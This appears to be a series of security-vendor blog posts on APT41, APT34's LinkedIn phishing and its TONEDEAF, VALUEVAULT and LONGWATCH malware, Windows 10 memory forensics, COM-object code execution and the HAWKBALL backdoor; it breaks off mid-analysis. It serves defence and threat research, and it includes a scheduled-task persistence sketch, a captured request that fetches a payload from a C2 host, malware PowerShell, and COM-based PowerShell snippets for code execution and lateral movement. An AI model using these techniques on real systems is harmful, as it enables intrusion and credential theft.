Two identified personas using the monikers “Zhang Xuguang” and “Wolfzhi” linked to APT41 operations have also been identified in Chinese-language forums. These individuals advertised their skills and services and indicated that they could be hired. Zhang listed his online hours as 4:00pm to 6:00am, similar to APT41 operational times against online gaming targets and suggesting that he is moonlighting. Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs.

Attribution to these individuals is backed by identified persona information, their previous work and apparent expertise in programming skills, and their targeting of Chinese market-specific online games. The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group’s later espionage operations.


Figure 2: Operational activity for gaming versus non-gaming-related targeting based on observed operations since 2012

The Right Tool for the Job

APT41 leverages an arsenal of over 46 different malware families and tools to accomplish its missions, including publicly available utilities, malware shared with other Chinese espionage operations, and tools unique to the group. The group often relies on spear-phishing emails with attachments such as compiled HTML (.chm) files to initially compromise its victims. Once in a victim organization, APT41 can leverage more sophisticated TTPs and deploy additional malware. For example, in a campaign that ran almost a year, APT41 compromised hundreds of systems and used close to 150 unique pieces of malware, including backdoors, credential stealers, keyloggers, and rootkits.

APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems. The use of bootkits in particular adds an extra layer of stealth because the code is executed prior to the operating system initializing. The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets.

Fast and Relentless

APT41 quickly identifies and compromises intermediary systems that provide access to otherwise segmented parts of an organization’s network. In one case, the group compromised hundreds of systems across multiple network segments and several geographic regions in as little as two weeks.

The group is also highly agile and persistent, responding quickly to changes in victim environments and incident responder activity. Hours after a victimized organization made changes to thwart APT41, for example, the group compiled a new version of a backdoor using a freshly registered command-and-control domain and compromised several systems across multiple geographic regions. In a different instance, APT41 sent spear-phishing emails to multiple HR employees three days after an intrusion had been remediated and systems were brought back online. Within hours of a user opening a malicious attachment sent by APT41, the group had regained a foothold within the organization's servers across multiple geographic regions.

Looking Ahead

APT41 is a creative, skilled, and well-resourced adversary, as highlighted by the operation’s distinct use of supply chain compromises to target select individuals, consistent signing of malware using compromised digital certificates, and deployment of bootkits (which is rare among Chinese APT groups).

Like other Chinese espionage operators, APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015. This shift, however, has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons. The group's capabilities and targeting have both broadened over time, signaling the potential for additional supply chain compromises affecting a variety of victims in additional verticals.

APT41's links to both underground marketplaces and state-sponsored activity may indicate the group enjoys protections that enable it to conduct its own for-profit activities, or that authorities are willing to overlook them. It is also possible that APT41 has simply evaded scrutiny from Chinese authorities. Regardless, these operations underscore a blurred line between state power and crime that lies at the heart of threat ecosystems and is exemplified by APT41.

Announcing the Sixth Annual Flare-On Challenge

The FireEye Labs Advanced Reverse Engineering (FLARE) team is thrilled to announce that the popular Flare-On reverse engineering challenge will return for the sixth straight year. The contest will begin at 8:00 p.m. ET on Aug. 16, 2019. This is a CTF-style challenge for all active and aspiring reverse engineers, malware analysts, and security professionals. The contest runs for six full weeks and ends at 8:00 p.m. ET on Sept. 27, 2019.

This year’s contest will feature a total of 12 challenges covering a variety of architectures and platforms, including x86 on Windows, .NET, Linux, and Android. Also, for the first time in Flare-On history, the contest will feature a NES ROM challenge. This is one of the only Windows-centric CTF contests out there, and we have crafted it to represent the skills and challenges our FLARE team faces.

If you are skilled and dedicated enough to complete the Sixth Flare-On challenge, you will receive a prize and recognition on the Flare-On website for your accomplishment. Prize details will be revealed later, but as always, it will be worthwhile swag to earn the envy of your peers. Previous prizes included belt buckles, a replica police badge, a challenge coin, and a huge pin.

Check the Flare-On website for a live countdown timer, to view the previous year’s winners, and to download past challenges and solutions for practice. For official news and information, we will be using the Twitter hashtag: #flareon6

Finding Evil in Windows 10 Compressed Memory, Part One: Volatility and Rekall Tools

Paging all digital forensicators, incident responders, and memory manager enthusiasts! Have you ever found yourself at a client site working around the clock to extract evil from a Windows 10 image? Have you hit the wall at step zero, running into difficulties viewing a process tree, or enumerating kernel modules? Or even worse, had to face the C-Suite and let them know you couldn’t find any evil? Well fear no more – FLARE has you covered. We’ve analyzed Windows 10 and integrated our research into the Volatility and Rekall tools for your immediate consumption!

Until August 2013, as a skilled consultant, you were generally in good shape. Your tools worked as you expected them to and you were able to forensicate rapidly. Windows 8.1 introduced changes that began to break the tools we know and love. This breakdown largely went unnoticed as most companies continued using Windows 7, but now corporate environments are rolling out Windows 10 images at an ever-increasing pace and forensic tools haven’t kept up.

This blog post is the first in a three-part series covering our Windows 10 memory forensics research. This post coincides with Omar Sardar and Blaine Stancill’s presentation at SANS DFIR Austin 2019 and is designed to introduce you to FLARE’s updates to Volatility and Rekall. The next post will coincide with our BlackHat USA 2019 presentation, in which Omar Sardar and Dimiter Andonov will dig into the nitty-gritty details of the Windows 10 memory manager. The final post will serve as a guide to those seeking to analyze the kernel on their own.

Overview

Traditionally, a complete Windows memory analysis only required forensic tools to parse physical memory and fill in any missing gaps from the pagefile. In Windows 8.1 Microsoft upended this paradigm with the introduction of memory compression and a new virtual store designed to contain compressed memory. While current tools can inspect traditional pagefiles on disk just fine, the virtual store poses a challenge due to sparse documentation and data compression.

To enable a more complete memory analysis on Windows 10, FireEye’s FLARE team analyzed the operating system’s memory manager as well as the algorithms and structures used to retrieve compressed memory. The memory we’re looking for is stored in a virtual store, created by the Store Manager kernel component. The Store Manager is responsible for managing data involved in performance optimization systems, including SuperFetch, ReadyBoost, and ReadyDrive. In this case, the Virtual Store is a RAM-backed entity, leveraging storage space in MemCompression for processes’ compressed data. The results of this research have been ported to both Volatility and Rekall to benefit the security community.

Volatility and Rekall

Volatility and Rekall are two of the most popular open-source memory forensic frameworks available. With the introduction of Windows memory compression, both frameworks have been unable to read compressed pages – until now! The effects of compression were immediately noticeable, as many plugins previously reported missing data or did not work at all. To demonstrate, we will utilize a common plugin called modules that lists drivers loaded at the time of memory capture. In Figure 1, drivers loaded on the system are enumerated, but several paths to the files on disk are paged out to the compression store. These missing paths could very well be the evil you were hunting!


Figure 1: Volatility & Rekall missing data stored in compressed pages

To deal with missing data due to compressed pages, FireEye's FLARE team made multiple additions to Volatility and Rekall to support Windows 10 memory compression. First and foremost, we added the necessary overlays:

An overlay describes the internal data structures used by the Windows 10 memory compression algorithm and makes them available in Python. For example, the overlays define the layout of the SMKM_STORE structure and the B+Trees used to look up compressed pages. These structures, among others, will be described in additional detail in Part Two of this blog series.

The undocumented Windows structures defined in the overlays are based on information we obtained through analyzing different versions of Windows 10. Being undocumented, these structures are susceptible to change across Windows builds, and even revisions. We currently support versions 1607, 1703, 1709, 1803, and 1809 on both 32-bit and 64-bit architectures. To support additional versions, the layout of the structures must be analyzed and the overlays updated accordingly. Analyzing the kernel to extract these structures will be discussed further in both Part Two and Part Three of this blog series.

The second modification to support compressed pages includes new address spaces for each framework:

Address spaces are responsible for satisfying memory read requests. When stacked on top of one another, each layer can translate the read request to an underlying base layer abstracting away the details of how the actual read is performed. An example translation is converting a virtual address to a physical address. Depending on the bottommost layer, the physical address may be an offset into a memory image, crash dump, or hibernate file. The takeaway is that an address space transparently resolves memory, regardless of its location and – most importantly – with zero effort on your part. Due to this seamless integration, users can interact with Volatility and Rekall just as before and, if a compressed page is detected, the new address spaces will take care of decompression in the background and return the decompressed data.

Back to our previous modules plugin example, Figure 2 demonstrates how the newly implemented address spaces properly decompress data located in compressed pages. No more hidden drivers or DLLs, among a plethora of other forensic artifacts. The data is now yours to continue your hunt for evil!


Figure 2: Volatility & Rekall decompressing compressed data

Get It Today

Head over to our Volatility and Rekall GitHub repositories to start using them today. After downloading or cloning the repositories, follow the installation instructions outlined in each repository's README and start finding that evil!
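Once installed, existing plugins can be run exactly as before. As a rough illustration only (the image file name is a placeholder and the profile name depends on the build of the captured image, so treat both as assumptions), a Volatility 2-style invocation of the modules plugin looks like this:

python vol.py -f win10-memory.raw --profile=Win10x64_17134 modules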

Conclusion

Windows 10 memory compression is a significant evolution in the design of the memory manager that increases system performance by making more efficient use of physical memory. This increase in performance comes at the cost of a more complex memory management system that is currently not publicly documented. Up until now, Volatility and Rekall were unable to inspect memory stored in compressed pages, opening the door to malicious programs and forensic artifacts going undetected. FireEye’s FLARE team hopes to fill the knowledge and technical gaps for Windows 10 compressed memory through contributions to Volatility and Rekall, as well as in presentations given at SANS DFIR (Finding Evil in Windows 10 Compressed Memory) and BlackHat USA 2019. We look forward to seeing you there and hearing your feedback, and we’re excited to see how these frameworks develop as a result of our contributions! Stay tuned for Part Two of our Finding Evil in Windows 10 Compressed Memory blog series.

Hard Pass: Declining APT34’s Invite to Join Their Professional Network

Background

With increasing geopolitical tensions in the Middle East, we expect Iran to significantly increase the volume and scope of its cyber espionage campaigns. Iran has a critical need for strategic intelligence and is likely to fill this gap by conducting espionage against decision makers and key organizations that may have information that furthers Iran's economic and national security goals. The identification of new malware and the creation of additional infrastructure to enable such campaigns highlights the increased tempo of these operations in support of Iranian interests.

FireEye Identifies Phishing Campaign

In late June 2019, FireEye identified a phishing campaign conducted by APT34, an Iranian-nexus threat actor. Three key attributes caught our eye with this particular campaign:

  1. Masquerading as a member of Cambridge University to gain victims’ trust and entice them to open malicious documents;
  2. The use of LinkedIn to deliver the malicious documents;
  3. The addition of three new malware families to APT34’s arsenal.

FireEye’s platform successfully thwarted this attempted intrusion, stopping a new malware variant dead in its tracks. Additionally, with the assistance of our FireEye Labs Advanced Reverse Engineering (FLARE), Intelligence, and Advanced Practices teams, we identified three new malware families and a reappearance of PICKPOCKET, malware exclusively observed in use by APT34. The new malware families, which we will examine later in this post, show APT34 relying on their PowerShell development capabilities, as well as trying their hand at Golang.

APT34 is an Iran-nexus cluster of cyber espionage activity that has been active since at least 2014. The group uses a mix of public and non-public tools to collect strategic information that would benefit nation-state interests pertaining to geopolitical and economic needs. APT34 aligns with elements of activity reported as OilRig and Greenbug by various security researchers. This threat group has conducted broad targeting across a variety of industries operating in the Middle East; however, we believe APT34's strongest interest is gaining access to financial, energy, and government entities.

Additional research on APT34 can be found in this FireEye blog post, this CERT-OPMD post, and this Cisco post.

Managed Defense also initiated a Community Protection Event (CPE) titled “Geopolitical Spotlight: Iran.” This CPE was created to ensure our customers are updated with new discoveries, activity, and detection efforts related to this campaign, along with other recent activity from Iranian-nexus threat actors, including APT33, which is mentioned in this updated FireEye blog post.

Industries Targeted

The activities observed by Managed Defense, and described in this post, were primarily targeting the following industries:

  • Energy and Utilities
  • Government
  • Oil and Gas

Utilizing Cambridge University to Establish Trust

On June 19, 2019, FireEye’s Managed Defense Security Operations Center received an exploit detection alert on one of our FireEye Endpoint Security appliances. The offending application was identified as Microsoft Excel and was stopped immediately by FireEye Endpoint Security’s ExploitGuard engine. ExploitGuard is our behavioral monitoring, detection, and prevention capability that monitors application behavior, looking for various anomalies that threat actors use to subvert traditional detection mechanisms. Offending applications can subsequently be sandboxed or terminated, preventing an exploit from reaching its next programmed step.

The Managed Defense SOC analyzed the alert and identified a malicious file named System.doc (MD5: b338baa673ac007d7af54075ea69660b), located in C:\Users\<user_name>\.templates. The file System.doc is a Windows Portable Executable (PE), despite having a "doc" file extension. FireEye identified this new malware family as TONEDEAF.

TONEDEAF is a backdoor that communicates with a single command and control (C2) server using HTTP GET and POST requests. It supports collecting system information, uploading and downloading files, and executing arbitrary shell commands. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution. We explore additional technical details of TONEDEAF in the malware appendix of this post.

Retracing the steps preceding exploit detection, FireEye identified that System.doc was dropped by a file named ERFT-Details.xls. Combining endpoint and network visibility, we were able to correlate that ERFT-Details.xls originated from the URL http://www.cam-research-ac[.]com/Documents/ERFT-Details.xls. Network evidence also showed the access of a LinkedIn message directly preceding the spreadsheet download.

Managed Defense reached out to the impacted customer’s security team, who confirmed the file was received via a LinkedIn message. The targeted employee conversed with "Rebecca Watts", allegedly employed as "Research Staff at University of Cambridge". The conversation with Ms. Watts, provided in Figure 1, began with the solicitation of resumes for potential job opportunities.


Figure 1: Screenshot of LinkedIn message asking to download TONEDEAF

This is not the first time we’ve seen APT34 utilize academia and/or job offer conversations in their various campaigns. These conversations often take place on social media platforms, which can be an effective delivery mechanism if a targeted organization is focusing heavily on e-mail defenses to prevent intrusions.

FireEye examined the original file ERFT-Details.xls, which was observed with at least two unique MD5 file hashes:

  • 96feed478c347d4b95a8224de26a1b2c
  • caf418cbf6a9c4e93e79d4714d5d3b87

A snippet of the VBA code, provided in Figure 2, creates System.doc in the target directory from base64-encoded text upon opening.


Figure 2: Screenshot of VBA code from System.doc

The spreadsheet also creates a scheduled task named "windows update check" that runs the file C:\Users\<user_name>\.templates\System Manager.exe every minute. Upon closing the spreadsheet, a final VBA function renames System.doc to System Manager.exe. Figure 3 provides a snippet of the VBA code that creates the scheduled task; the code is clearly obfuscated to evade simple detection.


Figure 3: Additional VBA code from System.doc
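For reference, a rough PowerShell equivalent of the persistence behavior described above is sketched below. This is an illustration only, not the dropper's actual code (which is obfuscated VBA); $env:USERPROFILE stands in for the redacted user directory, and on some Windows versions New-ScheduledTaskTrigger also requires -RepetitionDuration.

# Illustrative equivalent of the dropper's persistence, not the actual VBA.
$exe     = "$env:USERPROFILE\.templates\System Manager.exe"
$action  = New-ScheduledTaskAction -Execute $exe
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1)
Register-ScheduledTask -TaskName "windows update check" -Action $action -Trigger $trigger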

Upon first execution of TONEDEAF, FireEye identified a callback to the C2 server offlineearthquake[.]com over port 80.

The FireEye Footprint: Pivots and Victim Identification

After identifying the use of offlineearthquake[.]com as a potential C2 domain, FireEye’s Intelligence and Advanced Practices teams performed a wider search across our global visibility and identified additional artifacts and activity from the APT34 actors at other victim organizations. Of note, FireEye discovered two additional new malware families hosted at this domain, VALUEVAULT and LONGWATCH. We also identified a variant of PICKPOCKET, a browser credential-theft tool FireEye has been tracking since May 2018, hosted on the C2.

Requests to the domain offlineearthquake[.]com could take multiple forms, depending on the malware’s stage of installation and purpose. Additionally, during installation, the malware retrieves the system and current user names, which are used to create a three-character “sys_id”. This value is used in subsequent requests, likely to track infected target activity. URLs were observed with the following structures:

  • hxxp[://]offlineearthquake[.]com/download?id=<sys_id>&n=000
  • hxxp[://]offlineearthquake[.]com/upload?id=<sys_id>&n=000
  • hxxp[://]offlineearthquake[.]com/file/<sys_id>/<executable>?id=<cmd_id>&h=000
  • hxxp[://]offlineearthquake[.]com/file/<sys_id>/<executable>?id=<cmd_id>&n=000

The first executable identified by FireEye on the C2 was WinNTProgram.exe (MD5: 021a0f57fe09116a43c27e5133a57a0a), identified by FireEye as LONGWATCH. LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Windows temp folder. Further information regarding LONGWATCH is detailed in the Malware Appendix section at the end of the post.

FireEye Network Security appliances also detected the following being retrieved from APT34 infrastructure (Figure 4).

GET hxxp://offlineearthquake.com/file/<sys_id>/b.exe?id=<3char_redacted>&n=000 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) AppleWebKit/537.36 (KHTML, like Gecko)
Host: offlineearthquake[.]com
Proxy-Connection: Keep-Alive
Pragma: no-cache

Figure 4: Snippet of HTTP traffic retrieving VALUEVAULT; detected by FireEye Network Security appliance

FireEye identifies b.exe (MD5: 9fff498b78d9498b33e08b892148135f) as VALUEVAULT.

VALUEVAULT is a Golang compiled version of the "Windows Vault Password Dumper" browser credential theft tool from Massimiliano Montoro, the developer of Cain & Abel.

VALUEVAULT maintains the same functionality as the original tool by allowing the operator to extract and view the credentials stored in the Windows Vault. Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites. Further information regarding VALUEVAULT can be found in the appendix below.

Further pivoting from FireEye appliances and internal data sources yielded two additional files, PE86.dll (MD5: d8abe843db508048b4d4db748f92a103) and PE64.dll (MD5: 6eca9c2b7cf12c247032aae28419319e). These files were analyzed and determined to be 64- and 32-bit variants of the malware PICKPOCKET, respectively.

PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed during a Mandiant incident response in 2018 and, to date, solely utilized by APT34.

Conclusion

The activity described in this blog post presented a well-known Iranian threat actor utilizing their tried-and-true techniques to breach targeted organizations. Luckily, with FireEye’s platform in place, our Managed Defense customers were not impacted. Furthermore, upon the blocking of this activity, FireEye was able to expand upon the observed indicators to identify a broader campaign, as well as the use of new and old malware.

We suspect this will not be the last time APT34 brings new tools to the table. Threat actors are often reshaping their TTPs to evade detection mechanisms, especially if the target is highly desired. For these reasons, we recommend organizations remain vigilant in their defenses, and remember to view their environment holistically when it comes to information security.

Malware Appendix

TONEDEAF

TONEDEAF is a backdoor that communicates with its command and control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. Although the backdoor contains code to communicate via DNS requests with the hard-coded command and control server c[.]cdn-edge-akamai[.]com, this sample was not configured to use that functionality. Figure 5 provides a snippet showing the assembly CALL instruction to dns_exfil. The author likely included this as a fallback mechanism for future DNS-based exfiltration.


Figure 5: Snippet of code from TONEDEAF binary

Aside from not being enabled in this sample, the DNS tunneling functionality also contains missing values and bugs that prevent it from executing properly. One such bug involves determining the length of a command response string without accounting for Unicode strings. As a result, a single command response byte is sent when, for example, the malware executes a shell command that returns Unicode output. Additionally, within the malware, an unused string contained the address 185[.]15[.]247[.]154.

VALUEVAULT

VALUEVAULT is a Golang compiled version of the “Windows Vault Password Dumper” browser credential theft tool from Massimiliano Montoro, the developer of Cain & Abel.

VALUEVAULT maintains the same functionality as the original tool by allowing the operator to extract and view the credentials stored in the Windows Vault. Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites. A snippet of this function is shown in Figure 6.

powershell.exe /c "function get-iehistory {. [CmdletBinding()]. param (). . $shell = New-Object -ComObject Shell.Application. $hist = $shell.NameSpace(34). $folder = $hist.Self. . $hist.Items() | . foreach {. if ($_.IsFolder) {. $siteFolder = $_.GetFolder. $siteFolder.Items() | . foreach {. $site = $_. . if ($site.IsFolder) {. $pageFolder = $site.GetFolder. $pageFolder.Items() | . foreach {. $visit = New-Object -TypeName PSObject -Property @{ . URL = $($pageFolder.GetDetailsOf($_,0)) . }. $visit. }. }. }. }. }. }. get-iehistory

Figure 6: Snippet of PowerShell code from VALUEVAULT to extract browser credentials

Upon execution, VALUEVAULT creates a SQLite database file in the AppData\Roaming directory of the user account that executed it. This file is named fsociety.dat, and VALUEVAULT writes the dumped passwords to it in SQL format. This functionality is not in the original version of the “Windows Vault Password Dumper”. Figure 7 shows the SQL format of the fsociety.dat file.


Figure 7: SQL format of the VALUEVAULT fsociety.dat SQLite database

VALUEVAULT’s function names are not obfuscated and are directly reviewable through strings analysis. Other development artifacts, such as the Golang source file paths shown below, were also directly visible within the binary. VALUEVAULT does not possess the ability to perform network communication, meaning the operators would need to manually retrieve the captured output of the tool.

C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/new_edge.go
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/mozila.go
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/main.go
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/ie.go
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/Chrome Password Recovery.go

Figure 8: Golang files extracted during execution of VALUEVAULT

LONGWATCH

FireEye identified the binary WinNTProgram.exe (MD5: 021a0f57fe09116a43c27e5133a57a0a) hosted on the malicious domain offlineearthquake[.]com. FireEye identifies this malware as LONGWATCH. LONGWATCH is primarily a keylogger that outputs keystrokes to a log.txt file in the Windows temp folder.

Interesting strings identified in the binary are shown in Figure 9.

GetAsyncKeyState
>---------------------------------------------------\n\n
c:\\windows\\temp\\log.txt
[ENTER]
[CapsLock]
[CRTL]
[PAGE_UP]
[PAGE_DOWN]
[HOME]
[LEFT]
[RIGHT]
[DOWN]
[PRINT]
[PRINT SCREEN] (1 space)
[INSERT]
[SLEEP]
[PAUSE]
\n---------------CLIPBOARD------------\n
\n\n >>>  (2 spaces)
c:\\windows\\temp\\log.txt

Figure 9: Strings identified in a LONGWATCH binary

Detecting the Techniques

FireEye detects this activity across our platforms, including named detection for TONEDEAF, VALUEVAULT, and LONGWATCH. Table 1 contains several specific detection names that provide an indication of APT34 activity.

Signature Name
FE_APT_Keylogger_Win_LONGWATCH_1
FE_APT_Keylogger_Win_LONGWATCH_2
FE_APT_Keylogger_Win32_LONGWATCH_1
FE_APT_HackTool_Win_PICKPOCKET_1
FE_APT_Trojan_Win32_VALUEVAULT_1
FE_APT_Backdoor_Win32_TONEDEAF
TONEDEAF BACKDOOR [DNS]
TONEDEAF BACKDOOR [upload]
TONEDEAF BACKDOOR [URI]

Table 1: FireEye Platform Detections

Endpoint Indicators

Indicator               MD5 Hash (if applicable)            Code Family
System.doc              b338baa673ac007d7af54075ea69660b    TONEDEAF
                        50fb09d53c856dcd0782e1470eaeae35    TONEDEAF
ERFT-Details.xls        96feed478c347d4b95a8224de26a1b2c    TONEDEAF DROPPER
                        caf418cbf6a9c4e93e79d4714d5d3b87    TONEDEAF DROPPER
b.exe                   9fff498b78d9498b33e08b892148135f    VALUEVAULT
WindowsNTProgram.exe    021a0f57fe09116a43c27e5133a57a0a    LONGWATCH
PE86.dll                d8abe843db508048b4d4db748f92a103    PICKPOCKET
PE64.dll                6eca9c2b7cf12c247032aae28419319e    PICKPOCKET

Table 2: APT34 Endpoint Indicators from this blog post

Network Indicators

  • hxxp[://]www[.]cam-research-ac[.]com
  • offlineearthquake[.]com
  • c[.]cdn-edge-akamai[.]com
  • 185[.]15[.]247[.]154

Acknowledgements

A huge thanks to Delyan Vasilev and Alex Lanstein for their efforts in detecting, analyzing and classifying this APT34 campaign. Thanks to Matt Williams, Carlos Garcia and Matt Haigh from the FLARE team for the in-depth malware analysis.

Hunting COM Objects (Part Two)

Background

As a follow up to Part One in this blog series on COM object hunting, this post will talk about taking the COM object hunting methodology deeper by looking at interesting COM object methods exposed in properties and sub-properties of COM objects.

What is a COM Object?

According to Microsoft, “The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. COM is the foundation technology for Microsoft's OLE (compound documents), ActiveX (Internet-enabled components), as well as others.”

A COM object’s services can be consumed from almost any language by multiple processes, or even remotely. COM objects are usually obtained by specifying a CLSID (an identifying GUID) or ProgID (programmatic identifier). These COM objects are published in the Windows registry and can be extracted easily, as described below.

COM Object Enumeration

FireEye performed research into COM objects on Windows 10 and Windows 7, along with COM objects in Microsoft Office. Part One of this blog series described a technique for enumerating all COM objects on the system, instantiating them, and searching for interesting properties and methods. However, this only scratches the surface of what is accessible through these COM objects, as each object may return other objects that cannot be directly created on their own.

The change introduced here recursively searches for COM objects that are only exposed through the member methods and properties of each enumerated COM object. The original methodology looked at interesting methods exposed directly by each object and didn’t recurse into any properties that may also be COM objects with their own interesting methods. This improvement to the methodology assisted in the discovery of a new COM object that can be used for code execution, and new ways to call publicly known code execution COM object methods.

Recursive COM Object Method Discovery

A common theme among publicly discovered techniques for code execution using COM objects is that they take advantage of a method that is exposed within a child property of the COM object. An example of this is the “MMC20.Application” COM object. To achieve code execution with this COM object, you need to use the “ExecuteShellCommand” method on the View object returned by the “Document.ActiveView” property, as discovered by Matt Nelson in this blog post. In Figure 1 you can see how this method is only discoverable within the object returned by “Document.ActiveView”, and is not directly exposed by the MMC20.Application COM object.


Figure 1: Listing ExecuteShellCommand method in MMC20.Application COM object
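For context, a minimal PowerShell sketch of this publicly documented technique follows; the command and parameters are illustrative.

# ExecuteShellCommand lives on the View object returned by Document.ActiveView,
# not on the top-level MMC20.Application COM object.
$mmc = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application"))
$mmc.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c whoami", "7")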

Another example of this is the “ShellBrowserWindow” COM object, which was also first written about by Matt Nelson in this blog post. As you can see in Figure 2, the “ShellExecute” method is not directly exposed in the COM object. However, the “Document.Application” property returns an instance of the Shell object, which exposes the ShellExecute method.


Figure 2: Listing ExecuteShellCommand method in ShellBrowserWindow COM object

As evidenced by the previous two examples, it is important not only to look at methods exposed directly by a COM object, but also to recursively look for objects with interesting methods exposed as properties of that COM object. This example also illustrates why simply statically exploring the Type Libraries of the COM objects may not be sufficient: the relevant functions are only accessed after dynamically enumerating objects of the generic type IDispatch. This recursive methodology can enable finding new COM objects to be used for code execution, and different ways to use publicly known COM objects that can be used for code execution.

An example of how this recursive methodology found a new way to call a publicly known COM object method is the “ShellExecute” method in the “ShellBrowserWindow” COM object that was shown previously in this article. The previously publicly known way of calling this method within the “ShellBrowserWindow” COM object is using the “Document.Application” property. The recursive COM object method discovery also found that you can call the “ShellExecute” method on the object returned by the “Document.Application.Parent” property as seen in Figure 3. This can be useful from an evasion standpoint.


Figure 3: Alternative way to call ShellExecute with ShellBrowserWindow COM object
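Putting the two call paths side by side, a hedged PowerShell sketch is shown below. The CLSID is the commonly published one for ShellBrowserWindow (treat it as an assumption here), and the object generally requires an existing Explorer window to return a usable Document.

# ShellExecute is reachable only through child objects, not directly on ShellBrowserWindow.
$clsid = "C08AFD90-F2A1-11D1-8455-00A0C91F3880"
$sbw   = [activator]::CreateInstance([type]::GetTypeFromCLSID($clsid))
$sbw.Document.Application.ShellExecute("calc.exe")          # previously published path
$sbw.Document.Application.Parent.ShellExecute("calc.exe")   # alternative path found via recursion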

Command Execution

Using this recursive COM object method discovery, FireEye was able to find a COM object with the ProgID “Excel.ChartApplication” that can be used for code execution using the DDEInitiate method. This DDEInitiate method of launching executables was first abused in the “Excel.Application” COM object as seen in this article by Cybereason. There are multiple properties in the “Excel.ChartApplication” COM object that return objects that can be used to execute the DDEInitiate method as seen in Figure 4. Although this DDEInitiate method is also exposed directly by the COM object, it was initially discovered when looking at methods exposed in the other objects accessible from this object.


Figure 4: Different ways to call DDEInitiate with Excel.ChartApplication COM object
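A minimal sketch of the simplest variant, calling DDEInitiate directly on an object created from the ProgID named above, might look like the following; the payload string is illustrative.

# DDEInitiate can be reached directly or through several child objects, per Figure 4.
$chart = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.ChartApplication"))
$chart.DDEInitiate("cmd", "/c calc.exe")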

This COM object can also be instantiated and used remotely against Office 2013, as seen in Figure 5. The COM object can only be instantiated locally on Office 2016; when trying to instantiate it remotely against Office 2016, an error code is returned indicating that the COM class is not registered for remote instantiation.


Figure 5: Using Excel.ChartApplication remotely against Office 2013

Conclusion

The recursive searching of COM object methods can lead to the discovery of new COM objects that can be used for code execution, and new ways to call publicly known COM object methods. These COM object methods can be used to subvert different detection patterns and can also be used for lateral movement.

Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities

FireEye Labs recently observed an attack against the government sector in Central Asia. The attack involved the new HAWKBALL backdoor being delivered via well-known Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802.

HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.

Figure 1 shows the decoy used in the attack.


Figure 1: Decoy used in attack

The decoy file, doc.rtf (MD5: AC0EAC22CE12EAC9EE15CA03646ED70C), contains an OLE object that uses Equation Editor to drop the embedded shellcode in %TEMP% with the name 8.t. This shellcode is decrypted in memory by EQNEDT32.EXE. Figure 2 shows the decryption mechanism used in EQNEDT32.EXE.


Figure 2: Shellcode decryption routine

The decrypted shellcode is dropped as a Microsoft Word plugin WLL (MD5: D90E45FBF11B5BBDCA945B24D155A4B2) into C:\Users\ADMINI~1\AppData\Roaming\Microsoft\Word\STARTUP (Figure 3).


Figure 3: Payload dropped as Word plugin

Technical Details

DllMain of the dropped payload determines if the string WORD.EXE is present in the sample’s command line. If the string is not present, the malware exits. If the string is present, the malware executes the command RunDll32.exe C:\Users\ADMINI~1\AppData\Roaming\Microsoft\Word\STARTUP\hh14980443.wll, DllEntry using the WinExec() function.

DllEntry is the payload’s only export function. The malware creates a log file in %TEMP% with the name c3E57B.tmp. The malware writes the current local time plus two hardcoded values every time in the following format:

<Month int>/<Date int> <Hours>:<Minutes>:<Seconds>\t<Hardcoded Digit>\t<Hardcoded Digit>\n

Example:

05/22 07:29:17 4          0

This log file is written to every 15 seconds. The last two digits are hard coded and passed as parameters to the function (Figure 4).


Figure 4: String format for log file

The binary contains an encrypted config file of 0x78 bytes. The data is decrypted with a single-byte 0xD9 XOR operation. The decrypted data contains command and control (C2) information as well as a mutex string used during malware initialization. Figure 5 shows the decryption routine and decrypted config file.


Figure 5: Config decryption routine
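A minimal PowerShell sketch of that single-byte XOR decode is shown below. The input file name is a placeholder for the 0x78-byte blob carved from the sample; only the 0xD9 key and the length come from the analysis above.

# Hypothetical carve-and-decode of the 0x78-byte config blob ("config.bin" is a placeholder).
$blob    = [System.IO.File]::ReadAllBytes("config.bin")
$decoded = $blob[0..0x77] | ForEach-Object { $_ -bxor 0xD9 }
[System.Text.Encoding]::ASCII.GetString([byte[]]$decoded)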

The IP address from the config file is written to %TEMP%/3E57B.tmp with the current local time. For example:

05/22 07:49:48 149.28.182.78.

Mutex Creation

The malware creates a mutex to prevent multiple instances of execution. Before naming the mutex, the malware determines whether it is running under a system profile (Figure 6). To do this, the malware resolves the environment variable %APPDATA% and checks whether it contains the string config/systemprofile.


Figure 6: Verify whether malware is running as a system profile

If the malware is running as a system profile, the string d0c from the decrypted config file is used to create the mutex. Otherwise, the string _cu is appended to d0c and the mutex is named d0c_cu (Figure 7).


